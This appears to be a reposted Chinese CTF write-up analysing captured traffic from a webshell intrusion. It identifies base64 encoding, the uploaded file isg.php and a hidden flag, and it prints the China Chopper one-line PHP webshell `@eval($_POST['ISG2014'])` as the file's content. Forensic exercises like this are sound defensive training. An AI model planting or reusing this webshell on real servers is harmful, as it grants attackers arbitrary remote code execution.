当前位置: 首页 > news >正文

20250806_信安一把梭_test

Tags:流量分析, 应急响应, Webshell, 信安一把梭

0x00. 题目

流量包描述:可恶的黑客,在我的电脑上传了几个奇怪的文件,老师教了我排查但是我没学会,但是我认识大佬你,请你帮我排查一下,谢谢大佬

任务需求如下:

  1. 黑客一句话木马的加密方式

  2. 找到黑客上传的文件名字

  3. 获取文件的内容


附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件

附件名称:20250806_信安一把梭_test.zip

0x01. WP

1. 黑客一句话木马的加密方式

从脚本代码中可知,加密方式为base64

image

2. 找到黑客上传的文件名字

落地文件名为isg.php

image

3. 获取文件的内容

文件内容为<?php @eval($_POST['ISG2014']);?>

image

4. 彩蛋

最后还请求了/var/www/html/x.tar.gz文件,去除头尾标志位字符后另存解压,里面还隐藏了一个flag

ISG{China_Ch0pper_Is_A_Slick_Little_Webshe11}

image

http://www.gsyq.cn/news/9642.html

相关文章:

  • 专业 RAW 图像处理利器!DxO PhotoLab 让你的照片质感飙升
  • mysql时间转字符串,自定义格式将日期时间值转换为字符串
  • 其他与其它的区别
  • 实用指南:数据库造神计划第十七天---索引(2)
  • 指令流水线
  • nuget控制台乱码的解决办法
  • WPF TextBlock effect DropShadrowEffect,BlurEffect
  • 在控制台执行这段代码可以列出所有::selection规则
  • 超前探展!2025 云栖大会朋友圈晒图必备
  • 进程池
  • 报表神器Stimulsoft再升级!Stimulsoft Reports、Dashboards 和 PDF Forms 2025.4 即将发布!
  • 数显LED驱动芯片恒流数码管驱动IC内置显示RAM为816位 VK16D33
  • 【AI智能体】Dify 搭建数据分析应用实战操控详解
  • PostgreSQL 全表 count 优化实践:从 SeqScan 痛点分析到 heapam 改进与性能突破
  • Lightroom Classic 2025:精细调控,呈现完美画质,专业级数字照片管理与后期处理全解析
  • 负载分析和排查五
  • langfuse从v2.70.1升级到V3.110(异机升级+数据迁移)
  • 校u圈校园外卖众包任务课表交友CPS社区:一站式校园生态服务系统
  • AT_abc413_g [ABC413G] Big Banned Grid
  • 日常练习另一部分
  • 每天一个安卓测试开发小知识之 (六)---常用的adb 命令第四期
  • 视频融合平台EasyCVR国标GB28181视频诊断功能详解与实践
  • MyEMS 进阶应用:从单厂能耗管理到集团跨区域能源数据协同分析
  • avalonia android TextBox多行模式下回车会关闭输入法问题
  • client-go限速之QPS、Burst 和 RateLimiter
  • python实现网站登录会话脚本 - wanghongwei
  • 基于java+springboot的社区居民诊疗健康管理系统(源代码+文档+讲解视频) - 指南
  • 时序数据库IoTDB的六大实用场景盘点 - 指南
  • K8S的CoreDns配置文件添加域名解析
  • nodify_介绍及安装